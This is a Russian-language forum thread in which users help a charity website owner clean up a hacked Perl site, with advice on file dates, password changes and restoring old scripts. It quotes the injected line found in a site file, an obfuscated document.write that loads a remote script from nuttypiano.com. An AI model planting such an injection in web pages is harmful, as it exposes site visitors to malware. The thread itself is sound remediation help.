Как может антивирус найти вирусы в выкачанных с сайта скриптах? Вручную надо искать. Глазами. Смотреть по дате изменения файлов. Вы же помните когда в последний раз меняли что-то на сайте - на эту дату и ориентируйтесь. Можете просто загрузить последний незавирусованный вариант сайта.
Пароль мог быть перехвачен с помощью шпионских программ, вирусов.

Что это за скрипт, который выводится в сообщении антивируса? Явно открывает на сайте окно с вирусным компонентом.

выкачивание скриптов - это был совет службы техподдержки хостинга...
к сожалению, последний незавирусованный вариант выложить не могу, копию делала довольно давно, а на сайте постоянно появляются обновления, новые сообщения , файлы загружаются. или это не влияет на дату изменения скриптов?

читать дальшеинтересно, кому понадобилось ломать сайт благотворительной организации..

вы не могли бы посоветовать, что я могу сделать в связи с сообщением антивируса?

я впервые сталкиваюсь с такой пробелмой, поэтому, боюсь, мне нужна пошаговая инструкция.

1) попробуйте поискать ссылки на alert_box.js в ваших исходниках, если найдете - удалите
2) смените пароль к сайту
3) не храните пароль в тотал коммандере

Движок сайта, в который входят скрипты, шаблоны страниц, файлы настроек, не меняется при появлении новых сообщений, загрузке файлов и т.д. Обычно все распределено по папкам. Скрипты в своей папке, загружаемые файлы - в своей. Сообщения хранятся в базе MySQL и недоступны через ftp.
По ссылке из аваста у вас скрипт лежит прямо в корневой папке сайта. Обычно такого не бывает.
На даты смотрите и разбирайтесь. Сохраните текущую ftp-версию сайта на всякий пожарный. Далее замените файлы скриптов на старые. Лишние удалите.

Reuniko
1. с исходниками проблема - сайт написан на перле, там нет файлов которые мне знакомы по "работе" с сайтами сделанными целиком на html, например, у меня нет файла index.html при доступе по фтп. если честно, я вообще глядя на структуру сайта по ftp, слабо понимаю где у меня что
2. вс епароли тут же сменила - и фтпшные. и админские
3. пароль нигде не сохранен, только у меня в голове...

LAV ©
структура сайта для меня ужасно необычная.. дело в том что в "корне" у меня лежат папки: cgi, conf, docs и файлы errordocs, logs, php, stst.
и как мне сказал разработчик сайта - каталог docs не цчитывается в адресе файла, то есть если файл file положить в папку docs, то ссылка будет admil.ru/file, а не admil.ru/docs/file

попробую позаменять файлы скриптов на старые. и правда. .как только вытащу из комы тот компьютер, на котором у меня копия сайта..
скрипты лежат только в папке cgi?

В винде есть вкуснейшая функция: поиск внутри файлов вглубь папки, ваше дело лишь найти зараженные файлы, найти внутри них вхождения alert_box.js и поделять его нафиг. Замена движка на старую версию, разумеется, будет много лучше.

Reuniko я попробую, спасибо.. то есть я выкачиваю весь сайт по фтп, и в поиске windows задаю поиск по фразе в файле, правильно?
извините что переспрашиваю, но я очень неуверенно сбя чувствую в компьютерной терминологии.
какого черта мы тогда согласились на этот перл, в котором руками личн оя ничег осделать не могу..

Hemem, значит корневой папкой является docs. Остальные можно не смотреть.

LAV © ага. спасибо. попробую сделать сначала как сказала Реюнико, а потом буду искать старую версию сайта...
заранее вопрос - если я не найду старых скриптов(не знаю, удастся ли выскрести старую версию из компа, на который я ее скачивала), что я могу сделать?

может, дадите ссылку на сайт?

я боялась что это будет сочтено рекламой. =)
www.admil.ru

в одном из файлов нашла строку в одном из файлов нашла строку
document. write('< sc'+' ript type="text/javasсript" src="nuttypiano.com/Alert_Box. js">');

в самом конце файла. какую часть нужно удалить?

полностью удалить всю строку

спасибо огромное! сообщение о вирусе не появляется.

Hemem, info.diary.ru/index.php?title=%D0%92%D1%8B%D0%B...

время правильное, куки почистила, все еще выкиывает.
но с ругого компа- открывается, так что я спокойна, что проблема не в сайте и не в вирусе и не в логине. спасибо огромное!

Проверьте на другом браузере

на фаерфоксе работает. спасибо. я перепугалась, что проблема в админке. это было бы серьезнее..